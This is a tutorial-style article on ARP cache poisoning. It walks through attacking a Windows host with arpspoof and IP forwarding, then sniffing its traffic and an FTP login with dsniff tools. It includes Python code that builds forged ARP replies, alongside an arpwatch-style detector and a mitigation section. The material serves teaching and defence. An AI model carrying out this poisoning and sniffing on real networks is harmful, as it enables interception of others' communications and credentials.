In this article we will learn about attacking ARP.
Introduction to attacking ARP:
Address Resolution Protocol (ARP) translates IP addresses to MAC (hardware) addresses. Hosts on a LAN deliver frames to each other by MAC address, but at the start of a conversation a host knows only the IP address it wants to reach. It therefore broadcasts an ARP request asking which MAC address holds that IP address; the host that owns the address answers with an ARP reply, and communication proceeds. In OSI terms, ARP maps a network-layer address to a data-link-layer address.
The way ARP maps IP addresses to MACs is comparable to the way DNS maps domain names to IP addresses. Both lookups would otherwise have to be repeated for every new connection, so both keep a cache: the resolver keeps a DNS cache, and the host keeps ARP results in its ARP cache (the ARP table). It is this cache that the attacker targets.
ARP spoofing is when an attacker impersonates another host on the network. The attacker sends the gateway unsolicited ARP replies claiming that the victim's IP address is at the attacker's MAC address, and sends the victim replies claiming that the gateway's IP address is at the attacker's MAC address. Both caches are updated, so the victim now sends gateway-bound traffic to the attacker and the gateway sends victim-bound traffic to the attacker.
The figure below illustrates a typical ARP operation:
This image is the same as the process above but with an attacker in the picture:
At this point the attacker receives all traffic the gateway sends to the victim and vice versa. Left like that, the attack simply breaks the connection: packets meant for the victim never reach it, and the victim may grow suspicious. To avoid this, the attacker forwards the victim's packets on to the gateway and the gateway's packets back to the victim, so the two still appear to be talking directly.
Make it all a reality! On a Windows machine, run arp -a. The command lists the cache of neighbouring IP addresses with their MAC addresses. It works the same way on macOS and Linux, but our victim here is Windows.
In the cache above, the IP address 192.168.1.1 maps to the hardware address d4:ca:6d:fc:43:9f; it is this kind of gateway entry that the attacker will spoof. The victim's ARP cache, as seen above, consists of dynamic and static entries, and only the dynamic ones are at risk here. To watch how the victim communicates with the gateway during the attack, I run a continuous ping from the victim to the gateway with the Windows command ping -t.
During this test, the following IP addresses are used:
192.168.216.2 → Gateway device
192.168.216.129 → Victim address
192.168.216.130 → Attacker address
Continuous replies to the continuous ping confirm that the victim and the default gateway are talking normally.
Since hosts update their ARP cache from the replies they receive, the attacker's goal is to flood both the target and the remote host with forged ARP replies. To do this, the arpspoof command-line tool is run on a Linux box.
The -i switch specifies the network interface, -t the target host (the victim that receives the forged replies), and the final argument is the host whose IP address the attacker impersonates (the gateway here). The -r switch takes no argument: it tells arpspoof to poison both hosts, so the gateway is also told that the victim's IP address is at the attacker's MAC and traffic is captured in both directions.
ARP cache poisoning means corrupting the victim's cache by flooding it with ARP replies that map the gateway's IP address to the attacker's MAC; that is what the previous step achieved. ARP spoofing, sending forged replies, is the technique used to achieve it.
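To make the two forged replies concrete, here is an added example that builds and decodes exactly the frames an arpspoof-style poisoner repeats for the victim and gateway above. It is not code from the original article or from the dsniff suite. The IP addresses are the ones the article's test uses; every MAC address in it is constructed for the example, except 00:0c:29:81:19:63, which is assumed to be the attacker's because it is the address that appears twice in the article's Figure 9. The send_frame function is Linux-only and needs root, and nothing in the module calls it.

```python
"""Construct and decode the unsolicited ARP replies an arpspoof-style
poisoner sends.  Added example, not code from the article or from dsniff.
IPs are the article's test addresses; MACs are constructed, except
00:0c:29:81:19:63, assumed to be the attacker's (it appears twice in the
article's Figure 9)."""
import socket
import struct

ETH_P_ARP = 0x0806
ARP_OP_REPLY = 2
ARP_FRAME_LEN = 14 + 28  # Ethernet header + IPv4-over-Ethernet ARP body


def mac_bytes(mac: str) -> bytes:
    """'aa:bb:cc:dd:ee:ff' or 'aa-bb-cc-dd-ee-ff' -> 6 raw bytes."""
    return bytes.fromhex(mac.replace(":", "").replace("-", ""))


def mac_str(raw: bytes) -> str:
    return ":".join(f"{b:02x}" for b in raw)


def build_arp_reply(sender_mac, sender_ip, target_mac, target_ip) -> bytes:
    """Unicast Ethernet frame carrying an ARP reply that tells
    <target_mac>/<target_ip>: '<sender_ip> is at <sender_mac>'.
    Nobody asked; a receiver that trusts it overwrites its cache entry."""
    eth = mac_bytes(target_mac) + mac_bytes(sender_mac) + struct.pack("!H", ETH_P_ARP)
    # htype=1 (Ethernet), ptype=0x0800 (IPv4), hlen=6, plen=4, opcode=reply
    arp = struct.pack("!HHBBH", 1, 0x0800, 6, 4, ARP_OP_REPLY)
    arp += mac_bytes(sender_mac) + socket.inet_aton(sender_ip)
    arp += mac_bytes(target_mac) + socket.inet_aton(target_ip)
    return eth + arp


def parse_arp(frame: bytes) -> dict:
    """Decode an Ethernet/ARP frame into its fields; raises on anything else."""
    if len(frame) < ARP_FRAME_LEN:
        raise ValueError("frame too short for ARP")
    if struct.unpack("!H", frame[12:14])[0] != ETH_P_ARP:
        raise ValueError("not an ARP frame")
    htype, ptype, hlen, plen, op = struct.unpack("!HHBBH", frame[14:22])
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        raise ValueError("not IPv4-over-Ethernet ARP")
    return {
        "eth_dst": mac_str(frame[0:6]),
        "eth_src": mac_str(frame[6:12]),
        "op": op,
        "sender_mac": mac_str(frame[22:28]),
        "sender_ip": socket.inet_ntoa(frame[28:32]),
        "target_mac": mac_str(frame[32:38]),
        "target_ip": socket.inet_ntoa(frame[38:42]),
    }


def poison_pair(attacker_mac, victim_ip, victim_mac, gateway_ip, gateway_mac):
    """The two frames `arpspoof -i <iface> -t <victim> -r <gateway>` repeats:
    the victim is told the gateway lives at the attacker's MAC, and the
    gateway is told the victim does.  Both caches now point at the attacker."""
    to_victim = build_arp_reply(attacker_mac, gateway_ip, victim_mac, victim_ip)
    to_gateway = build_arp_reply(attacker_mac, victim_ip, gateway_mac, gateway_ip)
    return to_victim, to_gateway


def restore_pair(victim_ip, victim_mac, gateway_ip, gateway_mac):
    """The true mappings, sent when the attack stops (arpspoof does this on
    exit) so the hosts recover without waiting for poisoned entries to age out."""
    to_victim = build_arp_reply(gateway_mac, gateway_ip, victim_mac, victim_ip)
    to_gateway = build_arp_reply(victim_mac, victim_ip, gateway_mac, gateway_ip)
    return to_victim, to_gateway


def send_frame(frame: bytes, iface: str) -> None:
    """Put a raw frame on the wire.  Linux only; needs root or CAP_NET_RAW.
    Not called by anything below, so the module runs unprivileged."""
    with socket.socket(socket.AF_PACKET, socket.SOCK_RAW) as s:
        s.bind((iface, 0))
        s.send(frame)


if __name__ == "__main__":
    ATTACKER_MAC = "00:0c:29:81:19:63"
    VICTIM_MAC, GATEWAY_MAC = "00:0c:29:aa:bb:cc", "00:50:56:e1:11:22"  # constructed
    frames = poison_pair(ATTACKER_MAC, "192.168.216.129", VICTIM_MAC,
                         "192.168.216.2", GATEWAY_MAC)
    for label, frame in zip(("to victim", "to gateway"), frames):
        print(label, parse_arp(frame))
```

Note that nothing in the ARP body ties the sender hardware address to the host that actually owns the sender IP, which is the whole weakness. On Linux, the forwarding described above, so the victim's session survives while it is relayed through the attacker, is enabled with `sysctl -w net.ipv4.ip_forward=1` before the poisoning starts.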
Any kind of network snooping can be done at this point: view images from the victim's browser with driftnet, capture e-mail with mailsnarf, URLs with urlsnarf, instant messages with msgsnarf, files from NFS traffic with filesnarf, and raw packets with Wireshark or ettercap.
While I had driftnet active on the attacker, I opened the contributors page here at the InfoSec Institute and got the following:
Just to be a more prying attacker, I had a tmux session with mailsnarf, msgsnarf, and urlsnarf monitoring on 3 panes.
I won’t show what the end results of those were, as I’d be putting my privacy in jeopardy by doing so.
Okay, I will be nice enough to show results from urlsnarf and dsniff:
While urlsnarf was grabbing the URLs, I also kept dsniff monitoring the victim, and it picked up an FTP authentication attempt, which produced this:
The dsniff suite also provides multiple MITM tools including sshmitm, webmitm, and webspy.
An older and less targeted way to achieve something similar is macof, another tool from the dsniff suite (arpspoof, which I did not mention earlier, is also part of dsniff). Macof floods switched LAN ports with frames from random MAC addresses.
It is far noisier: the flood starts the instant the tool does, and its effect is to overflow the switch's MAC address table so that the switch begins forwarding frames out of every port like a hub. I would only consider it where the aim is disruption, treating ARP-level attacks as a denial-of-service asset, rather than quiet interception.
None of this would be possible if ARP replies were authenticated; hosts simply accept replies they never asked for.
Mitigating ARP spoof attacks
Detect duplicate MAC addresses: a good intrusion detection system (IDS) can be configured to flag heavy ARP traffic, duplicate MACs and MAC floods. Looking closer at Figure 9, two IP addresses share the MAC 00-0C-29-81-19-63; that is the signature of the poisoning and exactly what such a rule should catch.
Monitor Ethernet/IP address pairings. arpwatch, a Unix utility, keeps a database of the pairings it sees and reports when one changes; arpsnmp does the same from ARP tables collected over SNMP.
Use static ARP entries. As seen above, the entries that were poisoned in the victim's ARP cache were dynamic ones; a static entry for the gateway is not overwritten by a forged reply.
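The three measures above reduce to a small amount of bookkeeping over observed ARP replies. The following added example (not code from arpwatch, arpsnmp or ArpON) shows that logic: it raises an alarm when an IP's MAC changes, another when one MAC starts answering for several IPs, and it treats a pinned entry the way a static ARP entry behaves. The sample replies are constructed; the IP addresses are the article's, the attacker MAC is the one that appears twice in the article's Figure 9, and the other MACs are made up.

```python
"""arpwatch-style monitor over observed ARP replies.  Added example, not
code from arpwatch, arpsnmp or ArpON.  Sample replies below are constructed;
IPs are the article's, 00:0c:29:81:19:63 is the MAC that appears twice in
the article's Figure 9 (assumed to be the attacker), other MACs are made up."""
from collections import defaultdict


class ArpMonitor:
    def __init__(self, static=None):
        # Pinned IP -> MAC entries, the software equivalent of `arp -s`.
        self.static = {ip: mac.lower() for ip, mac in (static or {}).items()}
        self.table = dict(self.static)     # learned IP -> MAC pairings
        self.by_mac = defaultdict(set)     # MAC -> set of IPs it has claimed
        for ip, mac in self.static.items():
            self.by_mac[mac].add(ip)
        self.alerts = []

    def observe(self, ip, mac):
        """Feed the sender fields of one ARP reply; return the alerts it raised."""
        mac = mac.lower()
        new = []
        if ip in self.static:
            # A static entry is never overwritten by a reply, matching or not.
            if self.static[ip] != mac:
                new.append(f"spoofed reply ignored: {ip} claimed by {mac}, "
                           f"pinned to {self.static[ip]}")
            self.alerts += new
            return new
        old = self.table.get(ip)
        if old is None:
            self.table[ip] = mac            # new station: log-worthy, not alarming
        elif old != mac:
            # arpwatch's classic "changed ethernet address" condition
            new.append(f"changed ethernet address: {ip} {old} -> {mac}")
            self.table[ip] = mac
        before = len(self.by_mac[mac])
        self.by_mac[mac].add(ip)
        if len(self.by_mac[mac]) > 1 and len(self.by_mac[mac]) > before:
            # One MAC answering for two IPs is the Figure 9 signature.
            new.append(f"duplicate MAC: {mac} now claims {sorted(self.by_mac[mac])}")
        self.alerts += new
        return new


ATTACKER_MAC = "00:0c:29:81:19:63"
SAMPLE_REPLIES = [  # (sender IP, sender MAC) as seen on the wire; constructed
    ("192.168.216.2",   "00:50:56:e1:11:22"),  # gateway, genuine
    ("192.168.216.129", "00:0c:29:aa:bb:cc"),  # victim, genuine
    ("192.168.216.130", ATTACKER_MAC),          # attacker's own address
    ("192.168.216.2",   ATTACKER_MAC),          # arpspoof: gateway IP "is at" attacker
    ("192.168.216.129", ATTACKER_MAC),          # arpspoof: victim IP "is at" attacker
]


def run(replies=SAMPLE_REPLIES, static=None):
    """Replay a list of replies through a fresh monitor and return its alerts."""
    mon = ArpMonitor(static)
    for ip, mac in replies:
        mon.observe(ip, mac)
    return mon.alerts


if __name__ == "__main__":
    for line in run():
        print(line)
    print("-- with the gateway pinned:")
    for line in run(static={"192.168.216.2": "00:50:56:e1:11:22"}):
        print(line)
```

Running it without a pinned entry yields the two "changed ethernet address" alerts for the gateway and victim plus the duplicate-MAC alert; with the gateway pinned, the forged gateway reply is rejected outright and only the victim's entry flips, which is the difference between an alerting tool and a static entry. The same pinning is done on the Windows victim with `arp -s <gateway-ip> <gateway-mac>`.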
arpwatch and arpsnmp were mentioned above. Another good tool for taking preventive measures against ARP attacks is ArpON.
Before discussing ArpON further, a word on arping. arping works much like ping, except that where ping resolves a name to an IP address and then checks reachability with ICMP, arping sends ARP requests: it reports the MAC address that answers for a pinged IP address, and it can also ping a MAC address directly on an interface chosen with its interface switch.
ArpON (ARP handler inspection) is a daemon that makes ARP resistant to spoofing. It uses two techniques for this: SARPI (Static ARP Inspection) and DARPI (Dynamic ARP Inspection). Together they protect against both the distributed attack and the bidirectional attack we showed with macof and arpspoof. For bidirectional protection, ArpON has to run on both network devices, the target and the remote host, which here are the victim machine and the default gateway; to prevent distributed attacks it has to run on every computer in the LAN.
ArpON's daemon starts at boot once installed. It actively blocks ARP poisoning attempts using SARPI and DARPI, whereas tools like arpwatch and arpsnmp only alert you that an attack is under way.
ARP attacks exploit the fact that ARP maps network-layer addresses to data-link-layer addresses without any form of authentication. By sending unsolicited ARP replies, an attacker tricks a target into believing that another computer on the network is reachable at the attacker's hardware address.
One of the main ways to counter this is to detect, or refuse, the same MAC appearing against two IP addresses in the ARP cache. Of the mitigation tools mentioned, ArpON currently seems the strongest. IPv6 replaces ARP with Neighbor Discovery, but that protocol is open to the same spoofing unless Secure Neighbor Discovery (SEND) is deployed, so the move to IPv6 on its own does not put an end to these attacks.